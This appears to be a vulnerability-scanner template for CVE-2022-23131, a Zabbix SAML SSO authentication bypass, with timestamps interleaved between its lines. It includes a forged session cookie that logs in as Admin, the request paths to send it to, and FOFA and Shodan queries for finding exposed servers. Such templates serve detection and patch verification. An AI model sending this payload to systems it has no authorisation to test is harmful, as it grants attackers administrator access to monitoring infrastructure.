2022-02-20 12:37:19 +00:00
id : CVE-2022-23131
info :
2022-02-24 23:23:48 +00:00
name : Zabbix - SAML SSO Authentication Bypass
2022-02-20 12:37:19 +00:00
author : For3stCo1d
2022-02-24 23:34:03 +00:00
severity : critical
2022-02-28 21:20:42 +00:00
description : When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
2022-02-20 12:37:19 +00:00
reference :
2022-02-28 21:20:42 +00:00
- https://support.zabbix.com/browse/ZBX-20350
2022-02-20 12:37:19 +00:00
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
2022-02-24 23:34:03 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-23131
2022-02-25 12:03:39 +00:00
- https://github.com/1mxml/CVE-2022-23131
2022-05-17 09:18:12 +00:00
remediation : Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
2022-02-20 12:37:19 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-02-20 12:37:19 +00:00
cvss-score : 9.8
cve-id : CVE-2022-23131
2022-05-17 09:18:12 +00:00
cwe-id : CWE-290
2022-04-22 10:38:41 +00:00
metadata :
fofa-query : app="ZABBIX-监控系统" && body="saml"
2022-05-17 09:18:12 +00:00
shodan-query : http.favicon.hash:892542951
2022-02-25 12:03:39 +00:00
tags : cve,cve2022,zabbix,auth-bypass,saml,sso
2022-02-20 12:37:19 +00:00
requests :
2022-02-25 18:39:07 +00:00
- method : GET
path :
- "{{BaseURL}}/zabbix/index_sso.php"
- "{{BaseURL}}/index_sso.php"
2022-02-20 12:37:19 +00:00
2022-02-25 18:39:07 +00:00
headers :
Cookie : "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"
stop-at-first-match : true
2022-02-20 12:37:19 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 302
2022-02-24 23:23:48 +00:00
- type : dsl
dsl :
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
2022-02-28 21:20:42 +00:00
2022-03-08 15:28:19 +00:00
# Enhanced by mp on 2022/03/08